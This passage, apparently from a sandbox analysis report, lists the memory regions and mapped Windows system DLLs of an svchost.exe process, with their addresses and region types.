start_va = 0x2810000 end_va = 0x288ffff entry_point = 0x0 region_type = private name = "private_0x0000000002810000" filename = "" Region: id = 1140 start_va = 0x28e0000 end_va = 0x295ffff entry_point = 0x0 region_type = private name = "private_0x00000000028e0000" filename = "" Region: id = 1141 start_va = 0x2960000 end_va = 0x2a5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002960000" filename = "" Region: id = 1142 start_va = 0x2a90000 end_va = 0x2b0ffff entry_point = 0x0 region_type = private name = "private_0x0000000002a90000" filename = "" Region: id = 1143 start_va = 0x2b50000 end_va = 0x2bcffff entry_point = 0x0 region_type = private name = "private_0x0000000002b50000" filename = "" Region: id = 1144 start_va = 0x2bd0000 end_va = 0x2c4ffff entry_point = 0x0 region_type = private name = "private_0x0000000002bd0000" filename = "" Region: id = 1145 start_va = 0x2c50000 end_va = 0x2d4ffff entry_point = 0x0 region_type = private name = "private_0x0000000002c50000" filename = "" Region: id = 1146 start_va = 0x2dd0000 end_va = 0x2ecffff entry_point = 0x0 region_type = private name = "private_0x0000000002dd0000" filename = "" Region: id = 1147 start_va = 0x2f20000 end_va = 0x2f2ffff entry_point = 0x0 region_type = private name = "private_0x0000000002f20000" filename = "" Region: id = 1148 start_va = 0x2f80000 end_va = 0x2f8ffff entry_point = 0x0 region_type = private name = "private_0x0000000002f80000" filename = "" Region: id = 1149 start_va = 0x2fe0000 end_va = 0x305ffff entry_point = 0x0 region_type = private name = "private_0x0000000002fe0000" filename = "" Region: id = 1150 start_va = 0x3070000 end_va = 0x30effff entry_point = 0x0 region_type = private name = "private_0x0000000003070000" filename = "" Region: id = 1151 start_va = 0x3150000 end_va = 0x31cffff entry_point = 0x0 region_type = private name = "private_0x0000000003150000" filename = "" Region: id = 1152 start_va = 0x3210000 end_va = 0x328ffff entry_point = 0x0 region_type = private name = "private_0x0000000003210000" filename = "" Region: id = 1153 start_va = 0x32d0000 end_va = 0x334ffff entry_point = 0x0 region_type = private name = "private_0x00000000032d0000" filename = "" Region: id = 1154 start_va = 0x3350000 end_va = 0x33cffff entry_point = 0x0 region_type = private name = "private_0x0000000003350000" filename = "" Region: id = 1155 start_va = 0x33e0000 end_va = 0x345ffff entry_point = 0x0 region_type = private name = "private_0x00000000033e0000" filename = "" Region: id = 1156 start_va = 0x3460000 end_va = 0x355ffff entry_point = 0x0 region_type = private name = "private_0x0000000003460000" filename = "" Region: id = 1157 start_va = 0x3590000 end_va = 0x360ffff entry_point = 0x0 region_type = private name = "private_0x0000000003590000" filename = "" Region: id = 1158 start_va = 0x3630000 end_va = 0x36affff entry_point = 0x0 region_type = private name = "private_0x0000000003630000" filename = "" Region: id = 1159 start_va = 0x3720000 end_va = 0x379ffff entry_point = 0x0 region_type = private name = "private_0x0000000003720000" filename = "" Region: id = 1160 start_va = 0x3890000 end_va = 0x390ffff entry_point = 0x0 region_type = private name = "private_0x0000000003890000" filename = "" Region: id = 1161 start_va = 0x3950000 end_va = 0x39cffff entry_point = 0x0 region_type = private name = "private_0x0000000003950000" filename = "" Region: id = 1162 start_va = 0x39d0000 end_va = 0x3a4ffff entry_point = 0x0 region_type = private name = "private_0x00000000039d0000" filename = "" Region: id = 1163 start_va = 0x3a80000 end_va = 0x3afffff entry_point = 0x0 region_type = private name = "private_0x0000000003a80000" filename = "" Region: id = 1164 start_va = 0x3b80000 end_va = 0x3bfffff entry_point = 0x0 region_type = private name = "private_0x0000000003b80000" filename = "" Region: id = 1165 start_va = 0x3c60000 end_va = 0x3cdffff entry_point = 0x0 region_type = private name = "private_0x0000000003c60000" filename = "" Region: id = 1166 start_va = 0x3ce0000 end_va = 0x3edffff entry_point = 0x0 region_type = private name = "private_0x0000000003ce0000" filename = "" Region: id = 1167 start_va = 0x3f50000 end_va = 0x3fcffff entry_point = 0x0 region_type = private name = "private_0x0000000003f50000" filename = "" Region: id = 1168 start_va = 0x4020000 end_va = 0x409ffff entry_point = 0x0 region_type = private name = "private_0x0000000004020000" filename = "" Region: id = 1169 start_va = 0x4190000 end_va = 0x420ffff entry_point = 0x0 region_type = private name = "private_0x0000000004190000" filename = "" Region: id = 1170 start_va = 0x4340000 end_va = 0x43bffff entry_point = 0x0 region_type = private name = "private_0x0000000004340000" filename = "" Region: id = 1171 start_va = 0x43c0000 end_va = 0x443ffff entry_point = 0x0 region_type = private name = "private_0x00000000043c0000" filename = "" Region: id = 1172 start_va = 0x44f0000 end_va = 0x46effff entry_point = 0x0 region_type = private name = "private_0x00000000044f0000" filename = "" Region: id = 1173 start_va = 0x46f0000 end_va = 0x47effff entry_point = 0x0 region_type = private name = "private_0x00000000046f0000" filename = "" Region: id = 1174 start_va = 0x49a0000 end_va = 0x4a1ffff entry_point = 0x0 region_type = private name = "private_0x00000000049a0000" filename = "" Region: id = 1175 start_va = 0x4af0000 end_va = 0x4b6ffff entry_point = 0x0 region_type = private name = "private_0x0000000004af0000" filename = "" Region: id = 1176 start_va = 0x77a20000 end_va = 0x77b19fff entry_point = 0x77a20000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1177 start_va = 0x77b20000 end_va = 0x77c3efff entry_point = 0x77b20000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1178 start_va = 0x77c40000 end_va = 0x77de8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1179 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1180 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1181 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1182 start_va = 0xffc20000 end_va = 0xffc2afff entry_point = 0xffc20000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 1183 start_va = 0x7feddf00000 end_va = 0x7feddfd1fff entry_point = 0x7feddf00000 region_type = mapped_file name = "qmgr.dll" filename = "\\Windows\\System32\\qmgr.dll" (normalized: "c:\\windows\\system32\\qmgr.dll") Region: id = 1184 start_va = 0x7fee2750000 end_va = 0x7fee2794fff entry_point = 0x7fee2750000 region_type = mapped_file name = "upnp.dll" filename = "\\Windows\\System32\\upnp.dll" (normalized: "c:\\windows\\system32\\upnp.dll") Region: id = 1185 start_va = 0x7fef31c0000 end_va = 0x7fef31d5fff entry_point = 0x7fef31c0000 region_type = mapped_file name = "ncprov.dll" filename = "\\Windows\\System32\\wbem\\NCProv.dll" (normalized: "c:\\windows\\system32\\wbem\\ncprov.dll") Region: id = 1186 start_va = 0x7fef3730000 end_va = 0x7fef3771fff entry_point = 0x7fef3730000 region_type = mapped_file name = "tcpipcfg.dll" filename = "\\Windows\\System32\\tcpipcfg.dll" (normalized: "c:\\windows\\system32\\tcpipcfg.dll") Region: id = 1187 start_va = 0x7fef4dd0000 end_va = 0x7fef4e09fff entry_point = 0x7fef4dd0000 region_type = mapped_file name = "mprapi.dll" filename = "\\Windows\\System32\\mprapi.dll" (normalized: "c:\\windows\\system32\\mprapi.dll") Region: id = 1188 start_va = 0x7fef59a0000 end_va = 0x7fef59b1fff entry_point = 0x7fef59a0000 region_type = mapped_file name = "bitsigd.dll" filename = "\\Windows\\System32\\bitsigd.dll" (normalized: "c:\\windows\\system32\\bitsigd.dll") Region: id = 1189 start_va = 0x7fef59c0000 end_va = 0x7fef59cbfff entry_point = 0x7fef59c0000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 1190 start_va = 0x7fef5b20000 end_va = 0x7fef5b9dfff entry_point = 0x7fef5b20000 region_type = mapped_file name = "wbemess.dll" filename = "\\Windows\\System32\\wbem\\wbemess.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemess.dll") Region: id = 1191 start_va = 0x7fef5ba0000 end_va = 0x7fef5bb5fff entry_point = 0x7fef5ba0000 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 1192 start_va = 0x7fef5bc0000 end_va = 0x7fef5c7bfff entry_point = 0x7fef5bc0000 region_type = mapped_file name = "wmiprvsd.dll" filename = "\\Windows\\System32\\wbem\\WmiPrvSD.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprvsd.dll") Region: id = 1193 start_va = 0x7fef5c80000 end_va = 0x7fef5cf2fff entry_point = 0x7fef5c80000 region_type = mapped_file name = "repdrvfs.dll" filename = "\\Windows\\System32\\wbem\\repdrvfs.dll" (normalized: "c:\\windows\\system32\\wbem\\repdrvfs.dll") Region: id = 1194 start_va = 0x7fef5d00000 end_va = 0x7fef5d25fff entry_point = 0x7fef5d00000 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 1195 start_va = 0x7fef5d30000 end_va = 0x7fef5d9afff entry_point = 0x7fef5d30000 region_type = mapped_file name = "hnetcfg.dll" filename = "\\Windows\\System32\\hnetcfg.dll" (normalized: "c:\\windows\\system32\\hnetcfg.dll") Region: id = 1196 start_va = 0x7fef5da0000 end_va = 0x7fef5db8fff entry_point = 0x7fef5da0000 region_type = mapped_file name = "resutils.dll" filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll") Region: id = 1197 start_va = 0x7fef5dc0000 end_va = 0x7fef5e0ffff entry_point = 0x7fef5dc0000 region_type = mapped_file name = "clusapi.dll" filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll") Region: id = 1198 start_va = 0x7fef5e10000 end_va = 0x7fef5e23fff entry_point = 0x7fef5e10000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 1199 start_va = 0x7fef5e30000 end_va = 0x7fef5e9efff entry_point = 0x7fef5e30000 region_type = mapped_file name = "esscli.dll" filename = "\\Windows\\System32\\wbem\\esscli.dll" (normalized: "c:\\windows\\system32\\wbem\\esscli.dll") Region: id = 1200 start_va = 0x7fef5ea0000 end_va = 0x7fef5fcefff entry_point = 0x7fef5ea0000 region_type = mapped_file name = "wbemcore.dll" filename = "\\Windows\\System32\\wbem\\wbemcore.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemcore.dll") Region: id = 1201 start_va = 0x7fef5fd0000 end_va = 0x7fef5fe9fff entry_point = 0x7fef5fd0000 region_type = mapped_file name = "nci.dll" filename = "\\Windows\\System32\\nci.dll" (normalized: "c:\\windows\\system32\\nci.dll") Region: id = 1202 start_va = 0x7fef5ff0000 end_va = 0x7fef6063fff entry_point = 0x7fef5ff0000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 1203 start_va = 0x7fef6070000 end_va = 0x7fef60f3fff entry_point = 0x7fef6070000 region_type = mapped_file name = "netcfgx.dll" filename = "\\Windows\\System32\\netcfgx.dll" (normalized: "c:\\windows\\system32\\netcfgx.dll") Region: id = 1204 start_va = 0x7fef6300000 end_va = 0x7fef6324fff entry_point = 0x7fef6300000 region_type = mapped_file name = "browser.dll" filename = "\\Windows\\System32\\browser.dll" (normalized: "c:\\windows\\system32\\browser.dll") Region: id = 1205 start_va = 0x7fef6330000 end_va = 0x7fef636cfff entry_point = 0x7fef6330000 region_type = mapped_file name = "srvsvc.dll" filename = "\\Windows\\System32\\srvsvc.dll" (normalized: "c:\\windows\\system32\\srvsvc.dll") Region: id = 1206 start_va = 0x7fef6370000 end_va = 0x7fef6396fff entry_point = 0x7fef6370000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 1207 start_va = 0x7fef63a0000 end_va = 0x7fef6481fff entry_point = 0x7fef63a0000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 1208 start_va = 0x7fef64d0000 end_va = 0x7fef6516fff entry_point = 0x7fef64d0000 region_type = mapped_file name = "wdscore.dll" filename = "\\Windows\\System32\\wdscore.dll" (normalized: "c:\\windows\\system32\\wdscore.dll") Region: id = 1209 start_va = 0x7fef6520000 end_va = 0x7fef6561fff entry_point = 0x7fef6520000 region_type = mapped_file name = "sqmapi.dll" filename = "\\Windows\\System32\\sqmapi.dll" (normalized: "c:\\windows\\system32\\sqmapi.dll") Region: id = 1210 start_va = 0x7fef6570000 end_va = 0x7fef6580fff entry_point = 0x7fef6570000 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 1211 start_va = 0x7fef6590000 end_va = 0x7fef6621fff entry_point = 0x7fef6590000 region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 1212 start_va = 0x7fef7030000 end_va = 0x7fef7040fff entry_point = 0x7fef7030000 region_type = mapped_file name = "ssdpapi.dll" filename = "\\Windows\\System32\\ssdpapi.dll" (normalized: "c:\\windows\\system32\\ssdpapi.dll") Region: id = 1213 start_va = 0x7fef7190000 end_va = 0x7fef71f3fff entry_point = 0x7fef7190000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 1214 start_va = 0x7fef7200000 end_va = 0x7fef7270fff entry_point = 0x7fef7200000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 1215 start_va = 0x7fef73c0000 end_va = 0x7fef73d6fff entry_point = 0x7fef73c0000 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 1216 start_va = 0x7fef73e0000 end_va = 0x7fef758ffff entry_point = 0x7fef73e0000 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 1217 start_va = 0x7fef8120000 end_va = 0x7fef8128fff entry_point = 0x7fef8120000 region_type = mapped_file name = "tschannel.dll" filename = "\\Windows\\System32\\TSChannel.dll" (normalized: "c:\\windows\\system32\\tschannel.dll") Region: id = 1218 start_va = 0x7fef8940000 end_va = 0x7fef8959fff entry_point = 0x7fef8940000 region_type = mapped_file name = "rascfg.dll" filename = "\\Windows\\System32\\rascfg.dll" (normalized: "c:\\windows\\system32\\rascfg.dll") Region: id = 1219 start_va = 0x7fef8f60000 end_va = 0x7fef904dfff entry_point = 0x7fef8f60000 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 1220 start_va = 0x7fef9340000 end_va = 0x7fef934efff entry_point = 0x7fef9340000 region_type = mapped_file name = "ndiscapcfg.dll" filename = "\\Windows\\System32\\ndiscapCfg.dll" (normalized: "c:\\windows\\system32\\ndiscapcfg.dll") Region: id = 1221 start_va = 0x7fef9350000 end_va = 0x7fef9359fff entry_point = 0x7fef9350000 region_type = mapped_file name = "bitsperf.dll" filename = "\\Windows\\System32\\bitsperf.dll" (normalized: "c:\\windows\\system32\\bitsperf.dll") Region: id = 1222 start_va = 0x7fef93c0000 end_va = 0x7fef9436fff entry_point = 0x7fef93c0000 region_type = mapped_file name = "taskcomp.dll" filename = "\\Windows\\System32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll") Region: id = 1223 start_va = 0x7fef9440000 end_va = 0x7fef9449fff entry_point = 0x7fef9440000 region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll") Region: id = 1224 start_va = 0x7fef9450000 end_va = 0x7fef9561fff entry_point = 0x7fef9450000 region_type = mapped_file name = "schedsvc.dll" filename = "\\Windows\\System32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll") Region: id = 1225 start_va = 0x7fef9570000 end_va = 0x7fef957efff entry_point = 0x7fef9570000 region_type = mapped_file name = "wiarpc.dll" filename = "\\Windows\\System32\\wiarpc.dll" (normalized: "c:\\windows\\system32\\wiarpc.dll") Region: id = 1226 start_va = 0x7fef9580000 end_va = 0x7fef9588fff entry_point = 0x7fef9580000 region_type = mapped_file name = "fvecerts.dll" filename = "\\Windows\\System32\\fvecerts.dll" (normalized: "c:\\windows\\system32\\fvecerts.dll") Region: id = 1227 start_va = 0x7fef9590000 end_va = 0x7fef9598fff entry_point = 0x7fef9590000 region_type = mapped_file name = "tbs.dll" filename = "\\Windows\\System32\\tbs.dll" (normalized: "c:\\windows\\system32\\tbs.dll") Region: id = 1228 start_va = 0x7fef95a0000 end_va = 0x7fef95f5fff entry_point = 0x7fef95a0000 region_type = mapped_file name = "fveapi.dll" filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll") Region: id = 1229 start_va = 0x7fef9600000 end_va = 0x7fef965dfff entry_point = 0x7fef9600000 region_type = mapped_file name = "shsvcs.dll" filename = "\\Windows\\System32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll") Region: id = 1230 start_va = 0x7fef9660000 end_va = 0x7fef9677fff entry_point = 0x7fef9660000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 1231 start_va = 0x7fef9680000 end_va = 0x7fef9690fff entry_point = 0x7fef9680000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 1232 start_va = 0x7fef96b0000 end_va = 0x7fef9702fff entry_point = 0x7fef96b0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 1233 start_va = 0x7fefb650000 end_va = 0x7fefb663fff entry_point = 0x7fefb650000 region_type = mapped_file name = "sens.dll" filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll") Region: id = 1234 start_va = 0x7fefb670000 end_va = 0x7fefb67afff entry_point = 0x7fefb670000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1235 start_va = 0x7fefb680000 end_va = 0x7fefb6a6fff entry_point = 0x7fefb680000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1236 start_va = 0x7fefb6b0000 end_va = 0x7fefb716fff entry_point = 0x7fefb6b0000 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 1237 start_va = 0x7fefb730000 end_va = 0x7fefb73afff entry_point = 0x7fefb730000 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 1238 start_va = 0x7fefb740000 end_va = 0x7fefb74bfff entry_point = 0x7fefb740000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 1239 start_va = 0x7fefb750000 end_va = 0x7fefb75ffff entry_point = 0x7fefb750000 region_type = mapped_file name = "themeservice.dll" filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll") Region: id = 1240 start_va = 0x7fefb760000 end_va = 0x7fefb778fff entry_point = 0x7fefb760000 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 1241 start_va = 0x7fefb780000 end_va = 0x7fefb7b6fff entry_point = 0x7fefb780000 region_type = mapped_file name = "profsvc.dll" filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll") Region: id = 1242 start_va = 0x7fefb800000 end_va = 0x7fefb814fff entry_point = 0x7fefb800000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 1243 start_va = 0x7fefb820000 end_va = 0x7fefb8e1fff entry_point = 0x7fefb820000 region_type = mapped_file name = "gpsvc.dll" filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll") Region: id = 1244 start_va = 0x7fefbb00000 end_va = 0x7fefbb2cfff entry_point = 0x7fefbb00000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 1245 start_va = 0x7fefbb30000 end_va = 0x7fefbb4cfff entry_point = 0x7fefbb30000 region_type = mapped_file name = "mmcss.dll" filename = "\\Windows\\System32\\mmcss.dll" (normalized: "c:\\windows\\system32\\mmcss.dll") Region: id = 1246 start_va = 0x7fefbb50000 end_va = 0x7fefbb58fff entry_point = 0x7fefbb50000 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll") Region: id = 1247 start_va = 0x7fefbc10000 end_va = 0x7fefbc17fff entry_point = 0x7fefbc10000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 1248 start_va = 0x7fefbcd0000 end_va = 0x7fefbd55fff entry_point = 0x7fefbcd0000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 1249 start_va = 0x7fefbd60000 end_va = 0x7fefbd73fff entry_point = 0x7fefbd60000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 1250 start_va = 0x7fefbd80000 end_va = 0x7fefbd94fff entry_point = 0x7fefbd80000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 1251 start_va = 0x7fefbda0000 end_va = 0x7fefbdabfff entry_point = 0x7fefbda0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1252 start_va = 0x7fefbdb0000 end_va = 0x7fefbdc5fff entry_point = 0x7fefbdb0000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 1253 start_va = 0x7fefbdd0000 end_va = 0x7fefbdd7fff entry_point = 0x7fefbdd0000 region_type = mapped_file name = "sscore.dll" filename = "\\Windows\\System32\\sscore.dll" (normalized: "c:\\windows\\system32\\sscore.dll") Region: id = 1254 start_va = 0x7fefbe30000 end_va = 0x7fefbe6ffff entry_point = 0x7fefbe30000 region_type = mapped_file name = "wmisvc.dll" filename = "\\Windows\\System32\\wbem\\WMIsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wmisvc.dll") Region: id = 1255 start_va = 0x7fefbee0000 end_va = 0x7fefbef0fff entry_point = 0x7fefbee0000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 1256 start_va = 0x7fefbf00000 end_va = 0x7fefbf0efff entry_point = 0x7fefbf00000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 1257 start_va = 0x7fefc040000 end_va = 0x7fefc074fff entry_point = 0x7fefc040000 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 1258 start_va = 0x7fefc4b0000 end_va = 0x7fefc505fff entry_point = 0x7fefc4b0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1259 start_va = 0x7fefc510000 end_va = 0x7fefc63bfff entry_point = 0x7fefc510000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1260 start_va = 0x7fefc640000 end_va = 0x7fefc65cfff entry_point = 0x7fefc640000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 1261 start_va = 0x7fefc690000 end_va = 0x7fefc883fff entry_point = 0x7fefc690000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 1262 start_va = 0x7fefcd50000 end_va = 0x7fefcd5bfff entry_point = 0x7fefcd50000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 1263 start_va = 0x7fefcd60000 end_va = 0x7fefce1afff entry_point = 0x7fefcd60000 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 1264 start_va = 0x7fefce20000 end_va = 0x7fefce26fff entry_point = 0x7fefce20000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 1265 start_va = 0x7fefcf10000 end_va = 0x7fefcf2afff entry_point = 0x7fefcf10000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 1266 start_va = 0x7fefcf30000 end_va = 0x7fefcf4dfff entry_point = 0x7fefcf30000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 1267 start_va = 0x7fefcf50000 end_va = 0x7fefcf61fff entry_point = 0x7fefcf50000 region_type = mapped_file name = "devrtl.dll" filename = "\\Windows\\System32\\devrtl.dll" (normalized: "c:\\windows\\system32\\devrtl.dll") Region: id = 1268 start_va = 0x7fefcf70000 end_va = 0x7fefcf8efff entry_point = 0x7fefcf70000 region_type = mapped_file name = "spinf.dll" filename = "\\Windows\\System32\\SPInf.dll" (normalized: "c:\\windows\\system32\\spinf.dll") Region: id = 1269 start_va = 0x7fefd040000 end_va = 0x7fefd078fff entry_point = 0x7fefd040000 region_type = mapped_file name = "ubpm.dll" filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll") Region: id = 1270 start_va = 0x7fefd080000 end_va = 0x7fefd089fff entry_point = 0x7fefd080000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 1271 start_va = 0x7fefd090000 end_va = 0x7fefd09cfff entry_point = 0x7fefd090000 region_type = mapped_file name = "pcwum.dll" filename = "\\Windows\\System32\\pcwum.dll" (normalized: "c:\\windows\\system32\\pcwum.dll") Region: id = 1272 start_va = 0x7fefd180000 end_va = 0x7fefd1c6fff entry_point = 0x7fefd180000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1273 start_va = 0x7fefd270000 end_va = 0x7fefd29ffff entry_point = 0x7fefd270000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 1274 start_va = 0x7fefd2a0000 end_va = 0x7fefd2fafff entry_point = 0x7fefd2a0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1275 start_va = 0x7fefd410000 end_va = 0x7fefd416fff entry_point = 0x7fefd410000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 1276 start_va = 0x7fefd420000 end_va = 0x7fefd474fff entry_point = 0x7fefd420000 region_type = 